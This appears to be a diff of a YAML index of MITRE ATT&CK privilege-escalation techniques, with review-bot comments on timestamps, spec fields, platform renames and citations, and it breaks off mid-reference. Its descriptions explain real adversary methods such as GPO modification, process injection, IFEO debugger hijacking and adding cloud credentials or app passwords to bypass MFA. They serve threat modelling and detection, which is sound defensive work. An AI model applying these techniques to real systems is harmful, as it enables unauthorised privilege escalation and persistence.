x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -17873,7 +18199,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -17893,34 +18218,36 @@ privilege-escalation:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -17956,6 +18283,10 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -17967,16 +18298,12 @@ privilege-escalation:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -18012,12 +18339,12 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -18025,14 +18352,13 @@ privilege-escalation:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -18047,6 +18373,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -18055,18 +18382,18 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -18098,9 +18425,6 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -18172,7 +18496,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -18199,7 +18522,7 @@ privilege-escalation:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
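Review bot: the `modified` timestamp on T1546.005 moves backwards, from '2021-04-29T14:49:39.188Z' to '2020-03-24T16:43:02.273Z'. A regenerated index should never carry an older modification time than the one it replaces; the same regression appears on T1574.006, T1546.012, T1055.013, T1574.005, T1055.004, T1546.009, T1055.002, T1547.015, T1134.004, T1055.014 and T1546.014 below. Together with the removed `spec_version` lines this looks like the generator was pointed at an older or differently formatted source bundle; please confirm that is intended before merging.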
@@ -18225,13 +18548,11 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
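Review bot: T1546.005 loses `x_mitre_attack_spec_version: 2.1.0` together with `spec_version` and gets no replacement value, while neighbouring objects such as T1574.006 keep `x_mitre_attack_spec_version: 3.1.0`. After this change some techniques in the index carry an ATT&CK spec version and some carry none, which any consumer that keys off that field will have to special-case. Prefer keeping the field on every object (whatever value the source provides) or removing it uniformly.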
@@ -18352,12 +18673,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -18389,11 +18709,10 @@ privilege-escalation:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -18434,11 +18753,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -18494,12 +18812,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18556,7 +18873,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1547.004:
@@ -18626,7 +18942,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -18736,7 +19051,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -18790,7 +19104,7 @@ privilege-escalation:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -18823,13 +19137,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -18891,10 +19203,9 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -18952,7 +19263,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -18994,7 +19304,7 @@ privilege-escalation:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -19053,8 +19363,6 @@ privilege-escalation:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.005:
technique:
@@ -19084,7 +19392,7 @@ privilege-escalation:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -19119,12 +19427,10 @@ privilege-escalation:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19201,7 +19507,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1055.004:
@@ -19240,7 +19545,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -19289,8 +19594,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1546.009:
@@ -19322,7 +19625,7 @@ privilege-escalation:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19370,13 +19673,11 @@ privilege-escalation:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19389,16 +19690,16 @@ privilege-escalation:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -19410,16 +19711,16 @@ privilege-escalation:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
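Review bot: besides replacing `Azure AD` with `Identity Provider`, this hunk also removes `SaaS` from the platform list of T1098.005, leaving only `Windows` and `Identity Provider` at version '1.3'. That is a narrowing of scope, not just a rename, so any SaaS-platform index in this repository will no longer list Device Registration; worth calling out explicitly in the commit message so the change is not mistaken for part of the rename.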
@@ -19474,7 +19775,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.002:
technique:
@@ -19497,7 +19797,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19541,8 +19841,6 @@ privilege-escalation:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1547.015:
@@ -19619,7 +19917,7 @@ privilege-escalation:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -19647,8 +19945,6 @@ privilege-escalation:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1134.001:
@@ -19707,23 +20003,22 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -19733,11 +20028,15 @@ privilege-escalation:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -19748,12 +20047,19 @@ privilege-escalation:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
@@ -19762,6 +20068,7 @@ privilege-escalation:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
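Review bot: the `x_mitre_detection` text in this hunk is unchanged and still only covers Azure Activity Logs for service principal changes and APIs that create or import SSH keys, while the updated description now also describes `CreateLoginProfile` console passwords in AWS and app passwords in Entra ID. If this repository only mirrors upstream the mismatch belongs upstream, but if local edits to technique objects are permitted, the detection guidance should at least mention console login profile creation and app password registration events so the two halves of the object agree.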
@@ -19770,13 +20077,16 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
@@ -19802,10 +20112,18 @@ privilege-escalation:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
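Review bot: the new `Lacework AI Resource Hijacking 2024` reference is formatted title-first ("Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs."), while every other entry in this list, including the new `Permiso Scattered Spider 2023` entry, is author-first ("Ian Ahl. (2023, September 20). LUCR-3: ..."). If these descriptions are copied verbatim from upstream this is an upstream inconsistency; otherwise it should read "Lacework Labs. (2024, June 6). Detecting AI resource-hijacking with Composite Alerts." to match the rest.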
@@ -19814,10 +20132,20 @@ privilege-escalation:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
